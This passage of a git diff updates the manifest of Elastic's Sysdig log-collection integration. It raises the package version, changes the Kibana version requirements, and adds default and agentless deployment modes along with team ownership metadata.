started](https://www.elastic.co/guide/en/starting-with-the-elasticsearch-platform-and-its-solutions/current/getting-started-observability.html) guide. diff --git a/packages/sysdig/manifest.yml b/packages/sysdig/manifest.yml index e2349a13546..d45ee222f8f 100644 --- a/packages/sysdig/manifest.yml +++ b/packages/sysdig/manifest.yml @@ -1,7 +1,7 @@ format_version: 3.3.2 name: sysdig title: "Sysdig" -version: "2.3.0" +version: "2.4.0" description: "Collect logs from Sysdig using Elastic Agent." type: integration categories: @@ -13,7 +13,7 @@ categories: - security conditions: kibana: - version: "^8.16.0 || ^9.0.0" + version: "^8.19.16 || ^9.3.5" elastic: subscription: "basic" screenshots: @@ -42,6 +42,15 @@ policy_templates: - name: sysdig title: Sysdig logs description: Collect logs from Sysdig using Elastic Agent. + deployment_modes: + default: + enabled: true + agentless: + enabled: true + release: beta + organization: security + division: engineering + team: security-service-integrations inputs: - type: http_endpoint title: Collect Sysdig Alerts via HTTP